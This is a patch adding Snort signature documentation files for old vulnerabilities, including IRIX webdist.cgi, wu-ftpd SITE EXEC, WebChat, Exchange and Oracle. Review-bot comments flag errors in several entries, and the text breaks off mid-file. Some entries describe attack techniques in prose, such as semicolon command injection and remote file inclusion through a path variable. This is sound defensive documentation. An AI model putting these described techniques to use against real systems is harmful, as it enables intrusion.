+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
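Review bot: Attack Scenarios ("An attacker may make a request for a file with an overly long filename via a network share.") does not describe the RPC DCOM flaw given in Detailed Information, which is triggered by a malformed DCOM request sent over RPC; the scenario text appears to have been copied from a different signature and should be rewritten to match. "Expoit" under Ease of Attack is a typo for "Exploit", and Additional References is empty although the vendor bulletin and CVE entry for this vulnerability exist and should be listed.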
--- /dev/null
+++ b/doc/signatures/1163.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+Sid:
+1163
+
+--
+
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Web server running on an IRIX platform.
+
+--
+Impact:
+Serious. Execution of arbitrary code is possible.
+
+--
+Detailed Information:
+IRIX versions 5.0 through 6.3 contain a CGI script (/var/www/cgi-bin/webdist.cgi) 
+for remote administration purposes. This script, as originally released by 
+SGI, contains a vulnerability that can allow an attacker to run any 
+arbitrary command that the web server user has access to.
+
+--
+Affected Systems:
+	IRIX systems 5.0 to 6.3
+
+--
+Attack Scenarios:
+An attacker makes a request for the script followed by a semi-colon
+character ";" and then the command to be executed.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow the use of this script on the server.
+
+Check for further signs of compromise.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
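Review bot: The "--" separator between "Rule:" and "Sid:" is missing (the file goes straight from "Rule:" to "Sid:"), unlike every other signature file in this patch; add it so that anything splitting on "--" sees the same sections. "unkown" in Contributors is a typo for "unknown".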
--- /dev/null
+++ b/doc/signatures/1841.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+1841
+
+--
+Summary:
+This event is generated when a client on the protected network has 
+possibly visited a website containing malicious javascript code.
+
+--
+Impact:
+Minimal
+
+--
+Detailed Information:
+Certain versions of Mozilla and Netscape may allow script code to access
+local cookie data.
+
+By accessing a maliciously coded webpage, a users cookie data from any 
+domain may be viewed by the website's administrator.
+
+--
+Affected Systems:
+	Mozilla versions prior to 1.0.1
+	Netscape versions prior to 6.2.1 
+
+--
+Attack Scenarios:
+A devious website admin creates a webpage with malicious code and 
+obtains sensitive cookie data from a visiting user's web browser about 
+any domain he wishes.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives: 
+Some peer-to-peer applications may cause this rule to generate an event.
+
+--
+False Negatives: 
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com> 
+Snort documentation contributed by Josh Sakofsky
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/5293
+
+--
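Review bot: "a users cookie data" in Detailed Information should be "a user's cookie data", and the "-- " before Additional References lacks the blank line that precedes every other separator in the file and carries trailing whitespace. The document also never states what the rule matches on, which makes the peer-to-peer false-positive note hard to act on; one sentence describing the matched content would help an operator triage the event.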
--- /dev/null
+++ b/doc/signatures/2356.txt
@@ -0,0 +1,61 @@
+Rule:  
+
+--
+Sid:
+2356
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the PHP web application WebChat.
+
+--
+Impact:
+Execution of arbitrary code on the affected system
+
+--
+Detailed Information:
+WebChat contains a flaw such that it may be possible for an attacker
+to include code of their choosing by manipulating the variable
+WEBCHATPATH when making a GET or POST  request  to a vulnerable system.
+
+It may be possible for an attacker to execute that code with the
+privileges of the user running the webserver, usually root by supplying
+their code in the file db_mysql.php.
+
+--
+Affected Systems:
+	Webdev Webchat 0.77
+
+--
+Attack Scenarios:
+An attacker can make a request to an affected script and define their
+own path for the WEBCHATPATH variable.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
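Review bot: Detailed Information states that included code runs "with the privileges of the user running the webserver, usually root"; a web server normally runs as an unprivileged account (e.g. www-data or nobody), so "usually root" overstates the impact and should be dropped or qualified. "GET or POST  request  to" also contains doubled spaces.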
--- /dev/null
+++ b/doc/signatures/348.txt
@@ -0,0 +1,61 @@
+SID:
+348
+--
+
+Rule:
+--
+
+Summary:
+This event is generated when an attack attempt is made against an ftp 
+server possibly running a vulnerable ftpd
+--
+
+Impact:
+Possible remote execution of commands on the affected server as the root user
+--
+
+Detailed Information:
+The Washington University ftp daemon (wu-ftpd) does not perform proper 
+checking in its SITE EXEC implementation, and allows user input to be 
+sent directly to printf. This allows an attacker to overwrite data and 
+eventually execute code on the server.
+
+This rule detects code from a published exploit called bobek.c
+--
+
+Affected Systems:
+Any system running wu-ftpd 2.6 .0 or below
+--
+
+Attack Scenarios:
+A remote attacker will attempt to execute commands on the ftp server 
+with root user privileges, over writing or modifying system files. This 
+can be done with anonymous and real user logins.
+--
+
+Ease of Attack:
+Simple, Exploits exist
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Upgrade to latest version which has fixes for this problem. Maybe even get rid of wu-ftp with something more secure
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
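Review bot: This file departs from the layout used by every other signature document in the patch: "SID:" precedes "Rule:", each "--" separator comes before the blank line rather than after it, and the final section is titled "References:" instead of "Additional References:"; it should be reordered and relabelled for consistency. "wu-ftpd 2.6 .0" has a stray space ("2.6.0"), and "Maybe even get rid of wu-ftp with something more secure" should be reworded into a proper recommendation, e.g. "Consider replacing wu-ftpd with a more secure FTP daemon."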
--- /dev/null
+++ b/doc/signatures/2282.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2282
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application MediaWiki running on a server.
+
+--
+Impact:
+Possible execution of arbitrary code and unauthorized administrative
+access to the target system.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application MediaWiki . This application
+does not perform stringent checks when handling user input, this may 
+lead to the attacker being able to execute PHP code and include php files 
+of the attackers choosing.
+
+--
+Affected Systems:
+	MediaWiki MediaWiki-stable 20031107
+	MediaWiki MediaWiki-stable 20030829
+
+--
+Attack Scenarios:
+An attacker can exploit weaknesses to gain access as the administrator 
+by supplying input of their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
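Review bot: "MediaWiki ." in Detailed Information has a stray space before the period, and "This application does not perform stringent checks when handling user input, this may lead to" is a comma splice (split it into two sentences or use "which may lead to"). Additional References is empty; the advisory covering the two affected stable snapshots should be listed.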
--- /dev/null
+++ b/doc/signatures/100000732.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000732
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Geeklog" application running on a webserver. Access to the file "EditIPofURL.Admin.class.php" using a remote file being passed as the "$_CONF[path]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "$_CONF[path]" parameter in the "EditIPofURL.Admin.class.php" script used by the "Geeklog" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Geeklog
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
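Review bot: The file opens with two blank lines before "Rule:" and omits the blank line before the "--" separators following Sid, Affected Systems and Contributors, unlike the sibling files. "ona web server" is a typo for "on a web server", and "may indicate that an exploitation attempt has been attempted" is redundant ("may indicate an exploitation attempt"). Affected Systems ("All systems running CGI applications using Geeklog") should simply name the affected Geeklog versions.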
--- /dev/null
+++ b/doc/signatures/2416.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid: 
+2416
+
+--
+Summary:
+This event is generated when activity relating to spurious ftp traffic 
+is detected on the network.
+
+--
+Impact:
+Varies from information gathering to a serious compromise of an ftp 
+server.
+
+--
+Detailed Information:
+FTP is used to transfer files between hosts. This event is indicative of
+spurious activity in FTP traffic between hosts.
+
+The event may be the result of a transfer of a known protected file or 
+it could be an attempt to compromise the FTP server by overflowing a 
+buffer in the FTP daemon or service.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party 
+using FTP.
+
+An attacker might utilize a vulnerability in an FTP daemon to gain 
+access to a host, then upload a Trojan Horse program to gain control of 
+that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow access to FTP resources from hosts external to the protected 
+network.
+
+Use secure shell (ssh) to transfer files as a replacement for FTP.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
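Review bot: The "Affected Systems:" section is missing entirely (Detailed Information is followed directly by Attack Scenarios); add it, even if only as "Any system running an FTP server", so the file carries the same sections as the others. "None Known" under False Positives and False Negatives also lacks the trailing period used elsewhere.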
--- /dev/null
+++ b/doc/signatures/2581.txt
@@ -0,0 +1,77 @@
+Rule:
+
+--
+Sid:
+2581
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a directory
+traversal associated with the Crystal Reports web viewer.
+
+--
+Impact:
+A successful attack may allow unauthorized files to be viewed or
+possibly deleted.
+
+--
+Detailed Information:
+A vulnerability exists in the Crystal Reports web viewer that may permit
+an attacker to view or delete unauthorized files.  The is due to a
+failure to ensure that that a requested Crystal Report file location
+is in the web root directory, permitting unauthorized files to be
+viewed.
+
+In addition, Crystal Reports assumes that the requested report
+file for viewing is a temporary file and deletes it after the
+web version has been viewed.  This problem combined with the
+directory traversal vulnerability may allow sensitive or valuable
+files to be deleted.
+
+--
+Affected Systems:
+Crystal Reports 8.5 JAVA SDK
+Crystal Reports RAS 8.5 for UNIX
+Crystal Reports 9.0
+Crystal Enterprise 9.0
+Crystal Reports 10
+Crystal Reports 10.0
+
+--
+Attack Scenarios:
+An attacker can request to view a file not in the web root
+directory, permitting unauthorized information disclosure.
+The viewed file will be deleted subsequently possibly causing
+harm to the server.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0204
+
+Other:
+http://www.microsoft.com/security/bulletins/200406_crystal.mspx
+
+--
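Review bot: "The is due to a failure to ensure that that a requested Crystal Report file location" in Detailed Information should read "This is due to a failure to ensure that a requested ..."; Affected Systems lists both "Crystal Reports 10" and "Crystal Reports 10.0", which name the same product and should be collapsed; and the "Additional References" heading is missing its colon.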
--- /dev/null
+++ b/doc/signatures/568.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+568
+
+--
+Summary:
+This event is generated when an attempt is made to change the message on
+the LCD display on a JetDirect enabled HP printer.
+
+--
+Impact:
+User confusion and comedy, mostly.
+
+--
+Detailed Information:
+HP JetDirect printers allow remote machines to change the message that
+is displayed on the LCD panel via the PJL command. This event indicates
+that this command has been used in network traffic.
+
+--
+Affected Systems:
+	HP JetDirect enabled printers
+ 
+--
+Attack Scenarios:
+As part of an attempt to confuse and annoy users, an attacker may
+attempt to change the message displayed on the printers LCD screen.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Update to the latest JetDirect, and investigate the possibility of
+restricting access to a central print-server using the "allow: <ip>
+<netmask>" directive in a printer config file. 
+
+Disallow printer use from hosts outside the protected network.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by Jon Hart <warchild@spoofed.org>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
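Review bot: Corrective Action refers to the "allow: <ip> <netmask>" directive "in a printer config file" without saying which file or which software reads it; name both so an administrator can apply the restriction. "printers LCD screen" should be "printer's LCD screen", and the line after "HP JetDirect enabled printers" contains a lone space rather than being empty.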
--- /dev/null
+++ b/doc/signatures/2410.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2410
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
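Review bot: "ona web server" in Detailed Information is a typo for "on a web server", and the line "relationships between the victim server and other hosts can be exploited by the attacker." runs past the wrap width used in the rest of the file. The document is otherwise generic (no product, version or reference) although it carries a specific sid; at minimum the Summary should say what the rule matches on so an operator can triage the event.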
--- /dev/null
+++ b/doc/signatures/2196.txt
@@ -0,0 +1,55 @@
+Rule:  
+
+--
+Sid:
+2196
+
+--
+Summary:
+This event is generated when an attempt is made to access catgy.cgi on an internal web server. This may indicate an attempt to exploit a cross-site scripting vulnerability in Aktivate e-commerce software.
+
+--
+Impact:
+Arbitrary code execution, possible session hijack.
+
+--
+Detailed Information:
+Aktivate 1.03 is an e-commerce application for use on Linux and other UNIX-based operating systems. An attacker can craft a URL with malicious code in the "desc" command's argument that passes the commands to catgy.cgi. If a legitimate user activates the URL, malicious code may be executed on the client computer.   
+
+--
+Affected Systems:
+Systems running Aktivate 1.03.
+
+--
+Attack Scenarios:
+An attacker may craft a URL that, when activated by a legitimate user, obtains the user's session cookie, thereby allowing the attacker to pose as the user for the duration of the session.
+
+--
+Ease of Attack:
+Simple. A proof of concept exists.
+
+--
+False Positives:
+If a legitimate remote user accesses catgy.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+It is not known if this vulnerability has been fixed. Contact the vendor, Allen & Keul Web Solutions (http://www.allen-keul.net) for more information.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+http://www.securityfocus.com/bid/3714
+
+--
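Review bot: Impact ("Arbitrary code execution, possible session hijack.") overstates a cross-site scripting flaw: the injected script runs in the victim's browser under the site's origin, not as native code on either host, so "Script execution in the client browser, possible session hijack." would be accurate. "desc" is called a "command" in Detailed Information but is a parameter of catgy.cgi, and the link under Additional References lacks the "Bugtraq" label used in the sibling files.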
--- /dev/null
+++ b/doc/signatures/2016.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+2016
+
+--
+Summary:
+Remote Procedure Call (RPC) is a facility that enables a machine to 
+request a service from another remote machine. This is done without the 
+request for available services on a host.
+
+--
+Impact:
+This may be an intelligence gathering activity that could be the prelude
+to an attack against a vulnerable service on the host.
+
+--
+Detailed Information:
+This RPC status request returns information pertaining to available RPC 
+services running on a host. This is not an attack against a host by 
+itself but may be an intelligence gathering activity in prelude to an 
+attack against a vulnerable service running on a target host.
+
+--
+Affected Systems:
+All machines running RPC services.
+
+--
+Attack Scenarios:
+The attacker merely needs to request information about services being 
+offered on a target machine using "rpcinfo" for example.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+When seen on a local area network a legitimate rpcinfo request will 
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+RPC services should not be available outside the local area network, 
+filter RPC ports at the firewall to ensure access is denied to RPC 
+enabled machines.
+
+Disable all RPC services where not needed.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats:
+http://www.whitehats.com/info/IDS15/
+
+--
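Review bot: The False Positives entry is a truncated sentence ("When seen on a local area network a legitimate rpcinfo request will ") and must be completed, presumably with "...will generate this event." The Summary describes RPC in general rather than the event, and its second sentence ("This is done without the request for available services on a host.") is not intelligible; it should say that the event is generated on an RPC status request against a host, as Detailed Information already does.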
--- /dev/null
+++ b/doc/signatures/100000132.txt
@@ -0,0 +1,70 @@
+Rule: 
+
+--
+Sid: 
+100000132
+
+-- 
+Summary: 
+This event is generated when a connection is made to the Internet via a proxy 
+server on your internal network. 
+
+-- 
+
+Impact: 
+If the server is not legitimate, anyone with access to it can use your 
+bandwidth to access the Internet; if users conduct malicious activity on the 
+Internet through this server, the activity will appear to have come from the 
+misconfigured machine.
+
+--
+Detailed Information:
+This rule looks for pieces of HTTP requests being made by a misconfigured 
+Squid, ISA, or NetCache proxy server. If it fires, and the machine the alert is 
+coming from is not a known proxy server, it indicates that the machine in 
+question is either improperly configured or has been compromised.
+
+False positives associated with this rule may be reduced considerably, or even 
+eliminated, by the use of a custom variable. By editing your snort.conf to 
+include "var KNOWN_PROXY_SERVERS = [<list of valid servers]" and modifying the 
+rule to read "alert tcp !$KNOWN_PROXY_SERVERS", all proxy activity associated 
+with these machines will be ignored.
+
+--
+Affected Systems:
+
+--
+
+Attack Scenarios: 
+This vulnerability may be exploited with a web browser or a script.
+
+-- 
+
+Ease of Attack: 
+Simple, as it can be exploited using a web browser.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+Enforce access restrictions if this is a legitimate proxy server that is being 
+abused; remove the server from machines on which there was no legitimate 
+installation, and search for other signs of system compromise.
+
+--
+Contributors: 
+Alexandru Ionica <gremlin@networked.ro>
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+--
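Review bot: "var KNOWN_PROXY_SERVERS = [<list of valid servers]" in Detailed Information is missing the closing ">" of the placeholder. The Affected Systems section is empty, and "False Positives: None Known." contradicts the preceding paragraph, which explains how false positives from legitimate proxies are reduced with the KNOWN_PROXY_SERVERS variable; False Positives should state that legitimate proxy servers trigger the rule. Calling the condition a "vulnerability" in Attack Scenarios is also inaccurate; it is a misconfigured or unauthorized proxy.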
--- /dev/null
+++ b/doc/signatures/1060.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+1060
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+NGS Whitepaper - Advanced SQL Injection
+www.nextgenss.com/papers/advanced_sql_injection.pdf
+
+--
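Review bot: The reference "www.nextgenss.com/papers/advanced_sql_injection.pdf" lacks the "http://" scheme that every other URL in this patch carries; add it. The reference is also specific to SQL injection while the document describes a generic web-server rule; if the rule matches on SQL injection content the Summary should say so, otherwise a more general reference would fit better.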
--- /dev/null
+++ b/doc/signatures/2202.txt
@@ -0,0 +1,56 @@
+Rule:  
+
+--
+Sid:
+2202
+
+--
+Summary:
+This event is generated when an attempt is made to access edit_action.cgi on an internal web server. This may indicate an attempt to exploit a directory traversal vulnerability in Webmin 0.91.
+
+--
+Impact:
+Information gathering, possible execution of system utilities to which Webmin has rights.
+
+--
+Detailed Information:
+Webmin is a web-based system administration tool for Linux and UNIX-based operating systems. A malicious user could use directory traversal techniques within an argument sent to the edit_action.cgi script in order to view hidden files on the server or execute programs to which Webmin has security privileges. 
+
+--
+Affected Systems:
+Systems running Webmin 0.91.
+
+--
+Attack Scenarios:
+An attacker creates a specially crafted an edit_action.cgi URL and transmits it to a vulnerable server. The attacker can then view or execute any arbitrary file included in the parameter, provided that Webmin has rights to access it. 
+
+--
+Ease of Attack:
+Simple. A proof of concept exists.
+
+--
+False Positives:
+If a legitimate remote user accesses edit_action.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to Webmin 0.92 or higher.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/3698
+
+--
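Review bot: "An attacker creates a specially crafted an edit_action.cgi URL" in Attack Scenarios has a stray "an"; it should read "a specially crafted edit_action.cgi URL". The "-- " before Additional References also carries trailing whitespace.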
--- /dev/null
+++ b/doc/signatures/2254.txt
@@ -0,0 +1,75 @@
+Rule:  
+
+--
+Sid:
+2254
+
+--
+Summary:
+This rule has been deleted in favor of sid 2253.
+
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Exchange Server.
+
+--
+Impact:
+Serious. Possible execution of arbitrary code and Denial of Service
+(DoS).
+
+--
+Detailed Information:
+A vulnerability exists in versions of Microsoft Exchange Server such
+that it is possible for an attacker to execute arbitrary code or cause a
+DoS condition on the server without the need for prior authentication as
+a valid user.
+
+It is possible for an attacker to connect to the Exchange server on port
+25 and send an extended verb request to the server that will cause a
+large amount of memory to be allocated. In Exchange Server 5.5 this may
+cause a DoS, whilst in Exchange Server 2000 this same condition could
+present the attacker with an opportunity to execute arbitrary code.
+
+--
+Affected Systems:
+	MIcrosoft Exchange Server 5.5
+	Microsoft Exchange Server 2000
+
+--
+Attack Scenarios:
+The attacker can connect to port 25 of the server and send a specially
+crafted verb request.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Microsoft Corp.
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-046.asp
+
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0714
+
+--
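Review bot: The Summary opens with "This rule has been deleted in favor of sid 2253." yet the rest of the file documents the rule as if it were live; either drop the file or keep only a short notice pointing the reader at 2253.txt. "MIcrosoft Exchange Server 5.5" in Affected Systems has a capitalisation typo.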
--- /dev/null
+++ b/doc/signatures/2609.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2609
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "cancel_statistics" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by long strings in some parameters for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to either the "sname" or
+"oname" variables to cause the overflow. The result could
+permit the attacker to gain escalated privileges and run code of their
+choosing. This attack requires an attacker to logon to the database
+with a valid username and password combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck633.html
+
+--
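Review bot: the sentence "If you are running Oracle on a Windows server, make sure that the variable $ORACLE_PORTS is set to a value of "any"." is a Snort rule-variable caveat placed inside Detailed Information, where it reads as part of the vulnerability description; move it to the rule notes or Corrective Action and say that $ORACLE_PORTS is the Snort variable the rule matches on, so the reader understands why "any" is being recommended. Minor: "a Oracle database implementation" should be "an Oracle database implementation", and Contributors uses "Sourcefire Vulnerability Research Team" where neighbouring files use "Sourcefire Research Team".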
--- /dev/null
+++ b/doc/signatures/1905.txt
@@ -0,0 +1,68 @@
+Rule:
+--
+Sid:
+1905
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with the Remote Procedure Call (RPC) amd service.
+
+--
+Impact:
+Remote root access. This attack can permit execution of arbitrary
+commands with the privileges of the user running amd, typically root.
+
+--
+Detailed Information:
+The amd RPC service implements the automounter daemon on UNIX hosts. The
+amd service automatically mounts and unmounts requested file systems.
+There is a buffer overflow associated with amd logging that can allow
+execution of arbitrary commands with the privileges of the user running
+amd, typically root.
+
+--
+Affected Systems:
+	BSDI BSD/OS 3.1, 4.0.1
+	FreeBSD 3.0, 3.1, 3.2
